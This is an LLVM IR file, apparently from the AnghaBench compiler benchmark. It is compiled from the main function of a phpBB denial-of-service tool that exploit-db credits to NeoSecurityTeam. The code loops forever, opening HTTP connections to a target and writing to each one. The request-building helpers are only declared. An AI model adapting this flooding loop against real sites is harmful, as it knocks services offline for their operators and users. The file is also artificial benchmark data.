; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/php/dos/extr_1064.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/php/dos/extr_1064.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [35 x i8] c"[+] NsT-phpBBDoS v0.1 by HaCkZaTaN\00", align 1
@.str.1 = private unnamed_addr constant [20 x i8] c"[+] NeoSecurityTeam\00", align 1
@.str.2 = private unnamed_addr constant [26 x i8] c"[+] Dos has begun....[+]\0A\00", align 1
@stdout = common dso_local global i32 0, align 4
@SHUT_WR = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i32, align 4
  %7 = alloca i32, align 4
  %8 = alloca i8*, align 8
  %9 = alloca i8*, align 8
  %10 = alloca i8*, align 8
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  store i32 0, i32* %7, align 4
  %11 = load i8**, i8*** %5, align 8
  %12 = getelementptr inbounds i8*, i8** %11, i64 1
  %13 = load i8*, i8** %12, align 8
  store i8* %13, i8** %8, align 8
  %14 = load i8**, i8*** %5, align 8
  %15 = getelementptr inbounds i8*, i8** %14, i64 2
  %16 = load i8*, i8** %15, align 8
  store i8* %16, i8** %9, align 8
  %17 = load i8**, i8*** %5, align 8
  %18 = getelementptr inbounds i8*, i8** %17, i64 3
  %19 = load i8*, i8** %18, align 8
  store i8* %19, i8** %10, align 8
  %20 = call i32 @puts(i8* getelementptr inbounds ([35 x i8], [35 x i8]* @.str, i64 0, i64 0))
  %21 = call i32 @puts(i8* getelementptr inbounds ([20 x i8], [20 x i8]* @.str.1, i64 0, i64 0))
  %22 = call i32 @puts(i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str.2, i64 0, i64 0))
  %23 = load i32, i32* @stdout, align 4
  %24 = call i32 @fflush(i32 %23)
  %25 = load i32, i32* %4, align 4
  %26 = icmp ne i32 %25, 4
  br i1 %26, label %27, label %32

27:                                               ; preds = %2
  %28 = load i8**, i8*** %5, align 8
  %29 = getelementptr inbounds i8*, i8** %28, i64 0
  %30 = load i8*, i8** %29, align 8
  %31 = call i32 @Use(i8* %30)
  br label %32

32:                                               ; preds = %27, %2
  br label %33

33:                                               ; preds = %32, %33
  %34 = load i8*, i8** %10, align 8
  %35 = call i32 @Connection(i8* %34, i32 80)
  store i32 %35, i32* %6, align 4
  %36 = load i32, i32* %6, align 4
  %37 = load i8*, i8** %8, align 8
  %38 = load i8*, i8** %9, align 8
  %39 = load i8*, i8** %10, align 8
  %40 = load i32, i32* %7, align 4
  %41 = call i32 @Write_In(i32 %36, i8* %37, i8* %38, i8* %39, i32 %40)
  %42 = load i32, i32* %6, align 4
  %43 = load i32, i32* @SHUT_WR, align 4
  %44 = call i32 @shutdown(i32 %42, i32 %43)
  %45 = load i32, i32* %6, align 4
  %46 = call i32 @close(i32 %45)
  %47 = load i8**, i8*** %5, align 8
  %48 = getelementptr inbounds i8*, i8** %47, i64 2
  %49 = load i8*, i8** %48, align 8
  store i8* %49, i8** %9, align 8
  %50 = load i32, i32* %7, align 4
  %51 = add nsw i32 %50, 1
  store i32 %51, i32* %7, align 4
  br label %33
}

declare dso_local i32 @puts(i8*) #1

declare dso_local i32 @fflush(i32) #1

declare dso_local i32 @Use(i8*) #1

declare dso_local i32 @Connection(i8*, i32) #1

declare dso_local i32 @Write_In(i32, i8*, i8*, i8*, i32) #1

declare dso_local i32 @shutdown(i32, i32) #1

declare dso_local i32 @close(i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
